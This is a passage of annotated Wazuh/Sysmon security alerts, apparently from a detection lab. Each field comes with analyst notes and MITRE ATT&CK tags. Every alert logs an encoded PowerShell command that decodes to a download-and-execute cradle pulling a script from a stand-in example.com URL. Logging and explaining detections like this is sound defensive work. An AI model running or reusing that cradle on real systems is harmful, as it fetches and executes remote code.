No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd26-680a-460b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:34.202+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:34.202+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  57
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534254.1431216
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:31.7121992Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283853
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:31.699 ProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00} ProcessId: 10656 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pl3lg5tj.szw.ps1 CreationUtcTime: 2025-04-24 22:37:31.699 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:31.699
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd2a-680a-490b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10656
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pl3lg5tj.szw.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:31.699
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:36.742+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:36.742+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  54
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534256.1433985
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:34.5897282Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283901
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:33.020 ProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} ProcessId: 13716 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00} ParentProcessId: 10656 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:33.020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd2d-680a-4c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd2a-680a-490b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10656
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:36.746+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:36.746+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  58
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534256.1442056
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:34.8542189Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283902
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:34.803 ProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} ProcessId: 13716 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_awdjgktt.o0r.ps1 CreationUtcTime: 2025-04-24 22:37:34.803 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:34.803
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd2d-680a-4c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awdjgktt.o0r.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:34.803
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:40.368+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:40.368+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  55
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534260.1444825
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:37.7599742Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283927
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:36.286 ProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00} ProcessId: 5012 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} ParentProcessId: 13716 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:36.286
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd30-680a-4e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

